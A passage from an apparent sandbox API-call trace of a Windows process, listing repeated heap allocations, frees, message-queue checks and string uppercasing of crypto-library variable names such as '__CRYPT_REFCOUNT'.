lpMsg=0x8cf3a0) returned 0 [0264.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0264.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0264.067] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0264.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0264.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0264.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a30 [0264.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0264.067] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0264.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0264.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0264.067] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0264.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0264.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0264.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519b8 [0264.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0264.067] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0264.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0264.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0264.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0264.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0264.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0264.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0264.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0264.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0264.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b38 [0264.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0264.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b50 [0264.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51940 [0264.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51970 [0264.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0264.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0264.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b80 [0264.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519d0 [0264.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51988 [0264.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0264.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0264.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0264.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0264.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0264.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0264.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0264.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0264.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0264.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0264.069] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0264.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0264.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0264.069] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0264.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0264.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0264.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0264.069] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0264.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0264.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0264.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b80 [0264.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0264.069] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0264.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0264.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0264.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0264.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0264.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0264.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0264.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0264.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0264.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0264.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0264.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0264.070] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0264.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0264.070] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0264.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0264.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0264.070] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0264.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0264.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0264.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0264.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0264.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0264.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0264.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0264.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0264.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0264.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0264.071] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0264.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0264.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0264.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0264.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0264.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0264.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0264.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0264.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0264.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0264.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0264.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0264.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0264.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0264.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0264.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0264.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0264.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0264.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0264.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0264.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0264.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0264.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0264.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0264.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0264.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0264.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0264.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0264.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f146b0 | out: hHeap=0x970000) returned 1 [0264.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0264.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0264.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0264.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0264.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0264.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0264.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0264.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0264.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0264.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0264.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0264.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0264.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0264.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0264.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0264.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0264.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0264.073] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0264.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0264.073] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0264.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0264.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0264.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51790 [0264.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0264.073] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0264.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0264.073] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0264.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0264.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0264.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517c0 [0264.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0264.074] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0264.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0264.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0264.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0264.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0264.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0264.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0264.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0264.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0264.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0264.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51748 [0264.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0264.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515f8 [0264.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51898 [0264.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518b0 [0264.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0264.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0264.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515e0 [0264.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51640 [0264.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51928 [0264.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0264.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0264.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0264.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0264.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0264.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0264.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0264.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0264.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0264.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0264.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0264.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0264.075] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0264.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0264.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0264.075] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0264.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0264.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0264.075] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0264.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0264.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0264.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51748 [0264.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0264.076] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0264.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0264.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0264.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0264.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0264.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0264.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0264.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0264.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0264.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0264.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0264.076] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0264.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0264.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0264.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0264.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0264.077] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0264.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0264.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51868 [0264.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0264.077] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0264.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0264.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0264.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0264.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0264.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0264.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0264.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0264.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0264.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0264.077] RtlAllocateHeap (HeapHandle=0x970000, 